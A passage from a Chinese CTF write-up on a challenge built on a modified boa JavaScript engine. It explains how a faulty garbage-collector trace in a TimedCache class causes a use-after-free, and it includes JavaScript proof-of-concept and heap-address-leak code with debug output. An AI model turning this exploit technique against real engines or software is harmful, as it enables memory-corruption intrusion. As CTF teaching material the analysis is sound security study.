<code>Gc&lt;_&gt;</code> 指向的 Cell 被释放了，但 <code>Gc&lt;_&gt;</code> 本身还在 <code>TimeCachedValue</code>中，如果能在释放 <code>Gc::Cell</code> 后把 <code>Gc&lt;_&gt;</code> 指针偷出来，那就可以造成 UAF。</p><p>在整个 TimedCache 类的实现中，只有一处地方比较可疑，那就是 get 函数：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> <span class="keyword">let</span> <span class="variable">JsValue</span>::<span class="title function_ invoke__">Object</span>(<span class="keyword">ref</span> object) = this &#123;</span><br><span class="line">    <span class="comment">// 1. check expire</span></span><br><span class="line">    <span class="keyword">if</span> !<span class="title function_ invoke__">check_is_not_expired</span>(object, key, context)? &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title function_ invoke__">Ok</span>(JsValue::<span class="title function_ invoke__">undefined</span>());</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> <span class="variable">new_lifetime</span> = args.<span class="title function_ invoke__">get_or_undefined</span>(<span class="number">1</span>);</span><br><span class="line">    <span class="keyword">let</span> <span class="variable">expire</span> = <span class="keyword">if</span> !new_lifetime.<span class="title function_ invoke__">is_undefined</span>() &amp;&amp; !new_lifetime.<span class="title function_ invoke__">is_null</span>() &#123;</span><br><span class="line">        <span class="comment">// 2. calc new expire. Is it possible to collect `data`?</span></span><br><span class="line">        <span class="title function_ invoke__">Some</span>(<span class="title function_ invoke__">calculate_expire</span>(new_lifetime, context)?)</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="literal">None</span></span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">let</span> <span class="variable">Some</span>(cache) = object.<span class="title function_ invoke__">borrow_mut</span>().<span class="title function_ invoke__">as_timed_cache_mut</span>() &#123;</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">let</span> <span class="variable">Some</span>(cached_val) = cache.<span class="title function_ invoke__">get_mut</span>(key) &#123;</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">let</span> <span class="variable">Some</span>(expire) = expire &#123;</span><br><span class="line">                cached_val.expire = expire <span class="keyword">as</span> <span class="type">u128</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// 3. Maybe return freed reference of `data`</span></span><br><span class="line">            <span class="keyword">return</span> <span class="title function_ invoke__">Ok</span>(JsValue::<span class="title function_ invoke__">Object</span>(cached_val.data.<span class="title function_ invoke__">clone</span>()));</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="title function_ invoke__">Ok</span>(JsValue::<span class="title function_ invoke__">undefined</span>());</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在 <code>calculate_expire</code> 函数中，会对传入的 lifetime 参数调用 <code>to_integer_or_infinity</code> 方法：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">fn</span> <span class="title function_">calculate_expire</span>(lifetime: &amp;JsValue, context: &amp;<span class="keyword">mut</span> Context) <span class="punctuation">-&gt;</span> JsResult&lt;<span class="type">i128</span>&gt; &#123;</span><br><span class="line">    <span class="keyword">let</span> <span class="variable">lifetime</span> = lifetime.<span class="title function_ invoke__">to_integer_or_infinity</span>(context)?;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>如果传入的 lifetime 是一个精心构建的 object，那么我们便可以在 boa 调用 <code>calculate_expire</code> 时执行传入 lifetime 对象的 hook 函数，在这个函数中进行 sleep + gc。这样一来，在 <code>TimedCache::get</code> 函数中就可以尝试返回一个被释放掉的 gc 引用，触发 UAF。</p><p>后续便可通过堆喷 + UAF 来进行漏洞利用。</p><h2 id="四、浅析-rust-gc">四、浅析 rust-gc</h2><p>在做题时顺便研究了一下 rust-gc 库，看看有没有多线程竞争的可能。调试发现整个 boa 进程<strong>竟然只有一个主线程</strong>，当创建的对象总大小超过某个阈值后，boa 才会主动触发 GC 进行 mark &amp; sweep，这个初始阈值每个线程是 100 字节：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// /root/.cargo/registry/src/mirrors.tuna.tsinghua.edu.cn-df7c3c540f42cdbd/gc-0.4.1/src/gc.rs</span></span><br><span class="line"><span class="keyword">impl</span>&lt;T: Trace&gt; GcBox&lt;T&gt; &#123;</span><br><span class="line">    <span class="comment">/// Allocates a garbage collected `GcBox` on the heap,</span></span><br><span class="line">    <span class="comment">/// and appends it to the thread-local `GcBox` chain.</span></span><br><span class="line">    <span class="comment">///</span></span><br><span class="line">    <span class="comment">/// A `GcBox` allocated this way starts its life rooted.</span></span><br><span class="line">    <span class="title function_ invoke__">pub</span>(<span class="keyword">crate</span>) <span class="keyword">fn</span> <span class="title function_">new</span>(value: T) <span class="punctuation">-&gt;</span> NonNull&lt;<span class="keyword">Self</span>&gt; &#123;</span><br><span class="line">        GC_STATE.<span class="title function_ invoke__">with</span>(|st| &#123;</span><br><span class="line">            <span class="keyword">let</span> <span class="keyword">mut </span><span class="variable">st</span> = st.<span class="title function_ invoke__">borrow_mut</span>();</span><br><span class="line"></span><br><span class="line">            <span class="comment">// XXX We should probably be more clever about collecting</span></span><br><span class="line">            <span class="keyword">if</span> st.bytes_allocated &gt; st.threshold &#123;</span><br><span class="line">                <span class="comment">// HERE! </span></span><br><span class="line">                <span class="title function_ invoke__">collect_garbage</span>(&amp;<span class="keyword">mut</span> *st);</span><br><span class="line">                ...</span><br><span class="line">            &#125;</span><br><span class="line">            ...</span><br></pre></td></tr></table></figure><blockquote><p>rust-gc 库不长，花点时间理解库的实现对做题帮助巨大。</p></blockquote><p>每一个 GC 对象都有一个 GC header，用来记录当前对象的一些额外属性。例如 <code>mark</code> 标记，<code>next</code> GC 链上的下一个对象引用等等：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> <span class="variable">gcbox</span> = <span class="type">Box</span>::<span class="title function_ invoke__">into_raw</span>(<span class="type">Box</span>::<span class="title function_ invoke__">new</span>(GcBox &#123;</span><br><span class="line">    header: GcBoxHeader &#123;</span><br><span class="line">        roots: Cell::<span class="title function_ invoke__">new</span>(<span class="number">1</span>),</span><br><span class="line">        marked: Cell::<span class="title function_ invoke__">new</span>(<span class="literal">false</span>),</span><br><span class="line">        next: st.boxes_start.<span class="title function_ invoke__">take</span>(),</span><br><span class="line">    &#125;,</span><br><span class="line">    data: value,</span><br><span class="line">&#125;));</span><br></pre></td></tr></table></figure><p>当应用程序调用 <code>Gc::new</code> 函数创建堆对象时，该函数实际就会通过上面的 <code>GcBox</code>来创建对象：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">impl</span>&lt;T: Trace&gt; Gc&lt;T&gt; &#123;</span><br><span class="line">    <span class="comment">/// Constructs a new `Gc&lt;T&gt;` with the given value.</span></span><br><span class="line">    <span class="comment">///</span></span><br><span class="line">    <span class="comment">/// # Collection</span></span><br><span class="line">    <span class="comment">///</span></span><br><span class="line">    <span class="comment">/// This method could trigger a garbage collection.</span></span><br><span class="line">    <span class="comment">///</span></span><br><span class="line">    <span class="comment">/// # Examples</span></span><br><span class="line">    <span class="comment">///</span></span><br><span class="line">    <span class="comment">/// </span></span><br><span class="line">    <span class="comment">/// use gc::Gc;</span></span><br><span class="line">    <span class="comment">///</span></span><br><span class="line">    <span class="comment">/// let five = Gc::new(5);</span></span><br><span class="line">    <span class="comment">/// assert_eq!(*five, 5);</span></span><br><span class="line">    <span class="comment">/// </span></span><br><span class="line">    <span class="keyword">pub</span> <span class="keyword">fn</span> <span class="title function_">new</span>(value: T) <span class="punctuation">-&gt;</span> <span class="keyword">Self</span> &#123;</span><br><span class="line">        <span class="built_in">assert!</span>(mem::align_of::&lt;GcBox&lt;T&gt;&gt;() &gt; <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">unsafe</span> &#123;</span><br><span class="line">            <span class="comment">// Allocate the memory for the object</span></span><br><span class="line">            <span class="keyword">let</span> <span class="variable">ptr</span> = GcBox::<span class="title function_ invoke__">new</span>(value);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// When we create a Gc&lt;T&gt;, all pointers which have been moved to the</span></span><br><span class="line">            <span class="comment">// heap no longer need to be rooted, so we unroot them.</span></span><br><span class="line">            (*ptr.<span class="title function_ invoke__">as_ptr</span>()).<span class="title function_ invoke__">value</span>().<span class="title function_ invoke__">unroot</span>();</span><br><span class="line">            <span class="keyword">let</span> <span class="variable">gc</span> = Gc &#123;</span><br><span class="line">                ptr_root: Cell::<span class="title function_ invoke__">new</span>(NonNull::<span class="title function_ invoke__">new_unchecked</span>(ptr.<span class="title function_ invoke__">as_ptr</span>())),</span><br><span class="line">                marker: PhantomData,</span><br><span class="line">            &#125;;</span><br><span class="line">            gc.<span class="title function_ invoke__">set_root</span>();</span><br><span class="line">            gc</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>而 <code>Gc&lt;_&gt;</code> 结构体只会持有指向 <code>GcBox&lt;_&gt;</code> 的指针，同时也只有<code>GcBox&lt;_&gt;</code> 的分配与释放才会实际受到 mark&amp;sweep GC 的管理。</p><p>当触发 GC 开始 mark 阶段后，GC 会遍历之前维护的 <code>GcBox&lt;_&gt;</code> 链上的元素，将其挨个标记，并递归标记当前结构体的<strong>子字段</strong>。每个 GcBox 都有一个 root 字段（取值只有0和1），用于表示当前 GcBox 是否在 GC 维护的单向链表上。如果有些 GcBox 是其他 GcBox 的子字段，那么<strong>这些身为子字段的 GcBox，其 root 属性就会为 0</strong>。GC 回收的正是那些 <strong>不在 GcBox 链上且无 mark</strong> 的 GcBox。</p><p>在通过 <code>Gc::new</code> 创建 GcBox 时，GcBox 不会放置在 Gc 链上；但 gc 可以通过 boa 最顶端的 gc 持有者，一步步递归向下执行 trace 来标记各个 <code>GcBox&lt;_&gt;</code>。整个流程非常的自洽，没有问题。而本题之所以会有漏洞，是因为<strong>boa 对 TimeCachedValue 类实现的 <code>custom_trace</code>存在错误</strong> ：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsafe</span> <span class="keyword">impl</span> <span class="title class_">Trace</span> <span class="keyword">for</span> <span class="title class_">TimeCachedValue</span> &#123;</span><br><span class="line">    custom_trace!(this, &#123;</span><br><span class="line">        <span class="comment">// 外部可变条件</span></span><br><span class="line">        <span class="keyword">if</span> !this.<span class="title function_ invoke__">is_expired</span>() &#123;</span><br><span class="line">            <span class="title function_ invoke__">mark</span>(&amp;this.data);</span><br><span class="line">        &#125; </span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>将<strong>外部可变条件判断</strong>引入进 trace 中，就会导致出现<strong>虽然整体上这个 Gc 变量还在对象树上，但是 GC 中的数据已经被释放</strong>的情况。</p><blockquote><p>这里的外部可变条件是：<strong>时间</strong>。</p><p>换句话说，这个 trace 函数的实现违背了一个规则：<strong>不允许在变量所有权没有发生任何修改的情况下释放变量</strong>。</p></blockquote><p>下面是一个正确使用 custom_trace 的例子：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsafe</span> <span class="keyword">impl</span>&lt;V: Trace, S: BuildHasher&gt; Trace <span class="keyword">for</span> <span class="title class_">OrderedMap</span>&lt;V, S&gt; &#123;</span><br><span class="line">    custom_trace!(this, &#123;</span><br><span class="line">        <span class="keyword">for</span> (k, v) <span class="keyword">in</span> this.map.<span class="title function_ invoke__">iter</span>() &#123;</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">let</span> <span class="variable">MapKey</span>::<span class="title function_ invoke__">Key</span>(key) = k &#123;</span><br><span class="line">                <span class="title function_ invoke__">mark</span>(key);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="title function_ invoke__">mark</span>(v);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>可以看到该实现是尽心尽力地将 trace 传播进子字段中，没有引入其他外部可变条件。</p><h2 id="五、漏洞利用">五、漏洞利用</h2><h3 id="a-UAF">a. UAF</h3><p>在测试时无意间触发了一个 panic，代码如下：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">tc = <span class="keyword">new</span> <span class="title class_">TimedCache</span>()</span><br><span class="line">tc.<span class="title function_">set</span>(<span class="string">&#x27;k&#x27;</span>, &#123;&#125;, <span class="number">0</span>) <span class="comment">// lifetime = 0 使得计时器立即过期，JsObject 不再被 mark</span></span><br><span class="line">[ctrl+D 触发 <span class="variable constant_">EOF</span>，垃圾回收开始] <span class="comment">// panic!</span></span><br></pre></td></tr></table></figure><p>稍微整了一个稳触发版本：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">tc = new <span class="title function_ invoke__">TimedCache</span>()</span><br><span class="line">tc.<span class="title function_ invoke__">set</span>(<span class="string">&#x27;k&#x27;</span>, &#123;&#125;, <span class="number">0</span>)</span><br><span class="line">tc = null</span><br><span class="line">console.<span class="title function_ invoke__">collectGarbage</span>() <span class="comment">// panic!</span></span><br></pre></td></tr></table></figure><p>stack trace 很长，大致可以看出和 GC 有关。看了一下代码，这个 panic 是为了限制 <code>Gc&lt;_&gt;</code> <strong>勿在 sweep 阶段对所持有的 <code>GcBox&lt;_&gt;</code> 指针进行解引用</strong>，因为这会造成非预期情况，不够安全。</p><p>这段代码产生该类型 panic 的原因是因为 UAF。上面代码中 JS 对象<code>&#123;&#125;</code> 所在的 <code>GcBox</code> 本应该为 root=0，即正常<strong>不会进入</strong> unsafe 代码块，但由于内存释放，root 字段所在内存的值发生修改，因此 <code>self.rooted()</code> 返回 true，进入 unsafe 代码区域，触发 check 造成 panic：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">impl</span>&lt;T: Trace + ?<span class="built_in">Sized</span>&gt; <span class="built_in">Drop</span> <span class="keyword">for</span> <span class="title class_">Gc</span>&lt;T&gt; &#123;</span><br><span class="line">    <span class="meta">#[inline]</span></span><br><span class="line">    <span class="keyword">fn</span> <span class="title function_">drop</span>(&amp;<span class="keyword">mut</span> <span class="keyword">self</span>) &#123;</span><br><span class="line">        <span class="comment">// If this pointer was a root, we should unroot it.</span></span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">self</span>.<span class="title function_ invoke__">rooted</span>() &#123;</span><br><span class="line">            <span class="comment">// 不应该进入此分支</span></span><br><span class="line">            <span class="keyword">unsafe</span> &#123;</span><br><span class="line">                <span class="keyword">self</span>.<span class="title function_ invoke__">inner</span>().<span class="title function_ invoke__">unroot_inner</span>();</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>一路研究到现在，根据现有的思路，尝试构建出以下 POC:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// console wrapper</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">log</span> = (<span class="params">x</span>) =&gt; &#123; <span class="variable language_">console</span>.<span class="title function_">log</span>(x) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">debug</span> = (<span class="params">x</span>) =&gt; &#123; <span class="title function_">log</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(x)) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">gc</span> = (<span class="params"></span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">collectGarbage</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">sleep</span> = (<span class="params">x</span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">sleep</span>(x);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> fake_timeout = &#123; <span class="title function_">valueOf</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] fake_timeout called&quot;</span>);</span><br><span class="line">    <span class="title function_">sleep</span>(<span class="number">2000</span>);</span><br><span class="line">    <span class="title function_">gc</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>; </span><br><span class="line">&#125;&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> cache = <span class="keyword">new</span> <span class="title class_">TimedCache</span>();</span><br><span class="line">cache.<span class="title function_">set</span>(<span class="string">&#x27;key&#x27;</span>, <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">1024</span>), <span class="number">1000</span>);</span><br><span class="line"><span class="keyword">let</span> uaf_obj = cache.<span class="title function_">get</span>(<span class="string">&quot;key&quot;</span>, fake_timeout);</span><br><span class="line"><span class="title function_">debug</span>(uaf_obj);</span><br></pre></td></tr></table></figure><p>最后的 debug 输出了一个 JSObject，符合预期：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">JsValue @0x75870461d090</span><br><span class="line">Object @0x7587046c08a8</span><br><span class="line">- Methods @0x758704609310</span><br><span class="line">- Array Buffer Data @0x7587046d8000</span><br></pre></td></tr></table></figure><h3 id="b-leak-heap">b. leak heap</h3><p>接下来要想想该如何泄露有用的地址出来。可以试着将 free 后堆块中的数据输出出来看看：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// tools wrapper</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">log</span> = (<span class="params">x</span>) =&gt; &#123; <span class="variable language_">console</span>.<span class="title function_">log</span>(x) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">debug</span> = (<span class="params">x</span>) =&gt; &#123; <span class="title function_">log</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(x)) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">gc</span> = (<span class="params"></span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">collectGarbage</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">bp</span> = (<span class="params"></span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">sysbreak</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">sleep</span> = (<span class="params">x</span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">sleep</span>(x);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">hex</span> = (<span class="params">x</span>) =&gt; (<span class="string">&quot;0x&quot;</span> + x.<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment">// parse</span></span><br><span class="line"><span class="comment">// let get_js_value = (obj) =&gt; </span></span><br><span class="line"><span class="comment">//     Number.parseInt(console.debug(obj).split(&quot;JsValue @&quot;)[1].split(&quot;\n&quot;)[0]);</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_obj_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Object @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_method_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Methods @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_buffer_data_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Buffer Data @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> spray_obj = [];</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> fake_timeout = &#123; <span class="title function_">valueOf</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] fake_timeout called&quot;</span>);</span><br><span class="line">    <span class="title function_">sleep</span>(<span class="number">2000</span>);</span><br><span class="line">    <span class="title function_">gc</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>; </span><br><span class="line">&#125;&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> cache = <span class="keyword">new</span> <span class="title class_">TimedCache</span>();</span><br><span class="line">cache.<span class="title function_">set</span>(<span class="string">&#x27;key&#x27;</span>, <span class="keyword">new</span> <span class="title class_">Uint32Array</span>(<span class="number">20</span>), <span class="number">1000</span>);</span><br><span class="line"><span class="keyword">let</span> uaf_obj = cache.<span class="title function_">get</span>(<span class="string">&quot;key&quot;</span>, fake_timeout);</span><br><span class="line"></span><br><span class="line"><span class="title function_">debug</span>(uaf_obj);</span><br><span class="line"><span class="title function_">log</span>(uaf_obj.<span class="property">length</span>)</span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; uaf_obj.<span class="property">length</span>; ++i) &#123;</span><br><span class="line">    <span class="title function_">log</span>(i + <span class="string">&quot; =&gt; &quot;</span> + uaf_obj[i]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_">bp</span>();</span><br></pre></td></tr></table></figure><p>输出：</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">[+] fake_timeout called</span><br><span class="line">JsValue @<span class="number">0x72d3b041d090</span></span><br><span class="line">Object @<span class="number">0x72d3b04e7c28</span></span><br><span class="line">- Methods @<span class="number">0x72d3b0409460</span></span><br><span class="line"></span><br><span class="line"><span class="number">20</span></span><br><span class="line"><span class="number">0</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">1</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">2</span> =&gt; <span class="number">2957263088</span></span><br><span class="line"><span class="number">3</span> =&gt; <span class="number">29395</span></span><br><span class="line"><span class="number">4</span> =&gt; <span class="number">152870256</span></span><br><span class="line"><span class="number">5</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">6</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">7</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">8</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">9</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">10</span> =&gt; <span class="number">2957103232</span></span><br><span class="line"><span class="number">11</span> =&gt; <span class="number">29395</span></span><br><span class="line"><span class="number">12</span> =&gt; <span class="number">1</span></span><br><span class="line"><span class="number">13</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">14</span> =&gt; <span class="number">1</span></span><br><span class="line"><span class="number">15</span> =&gt; <span class="number">0</span></span><br><span class="line"><span class="number">16</span> =&gt; <span class="number">4282195719</span></span><br><span class="line"><span class="number">17</span> =&gt; <span class="number">32767</span></span><br><span class="line"><span class="number">18</span> =&gt; <span class="number">2957250560</span></span><br><span class="line"><span class="number">19</span> =&gt; <span class="number">29395</span></span><br></pre></td></tr></table></figure><p>可以看到这里的输出有两种数对，每种数对中都有一大一小两个数，组合起来刚好为有效内存地址：</p><ul><li><p><code>uaf_obj[3] * 0x100000000 + uaf_obj[2] == 0x72d3b04440f0</code>：</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827091210675.png" alt="image-20220827091210675"></p><p>这块内存由 rust 自己来管理。在 exp 不变的情况下，这个地址相对于当前段的偏移，将大概在 <code>0x4440f0</code>左右。</p></li><li><p><code>uaf_obj[17] * 0x100000000 + uaf_obj[16] == 0x7fffff3d1f07</code>，相对偏移 <code>0x1f07</code>：</p><p><img src="/2022/08/defcon30quals_constricted/image-20220827092216977.png" alt="image-20220827092216977"></p></li></ul><blockquote><p>注意：set 进 TimedCache 的 Array 长度为 20，太长或太短都无法收集到有意义的指针。</p></blockquote><p>这样我们就能获取到这两个段的基地址；有意思的是，这两个段中间那个被夹着的段正是<strong>在执行 main 函数前通过 ctor 执行 mmap 操作</strong>所分配的内存，这块内存在每次重启程序后，长度都会发生变化（因为 getrandom）：</p><blockquote><p>注意程序会被调试多次，因此每张图中的地址不会一一对应（例如上图中的地址就无法映射至下图）。</p></blockquote><p><img src="/2022/08/defcon30quals_constricted/image-20220827095505733.png" 